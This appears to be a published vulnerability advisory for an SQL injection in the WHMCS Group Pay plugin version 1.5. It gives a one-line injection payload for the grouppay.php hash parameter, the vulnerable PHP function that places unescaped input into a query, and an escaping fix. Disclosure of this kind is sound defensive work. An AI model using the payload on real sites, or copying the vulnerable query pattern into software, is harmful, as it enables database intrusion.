WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php?hash' SQL Injection

#######################################################################

Tile:      WHMCS grouppay plugin SQL Injection <= 1.5
Author: HJauditing Employee Tim
E-mail: [email protected]
Web:    http://hjauditing.com/
Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html

#######################################################################

============
Introduction
============

We have found a SQL injection inside the group pay plugin for WHCMS.
A lot of game hosting companies are using this plugin.
SQL Injection is in the function gp_LoadUserFromHash.

============
Exploits
============

- SQL Injection
grouppay.php?hash=%hash%' and '1'='1

============
Code SQL Injection
============

/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
    //Kill the Dashes
    $hash = str_replace ( "-", "", $hash );
    $result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
    if($result){
        $row = mysql_fetch_row ( $result );
        return $row [0];
    }else{
        return false;   
    }
}

============
Fix
============

/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash) {
    //Kill the Dashes
    $hash = str_replace ( "-", "", $hash );
    $hash = mysql_real_escape_string($hash);
    $result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
    if($result){
        $row = mysql_fetch_row ( $result );
        return $row [0];
    }else{
        return false;   
    }
}

#######################################################################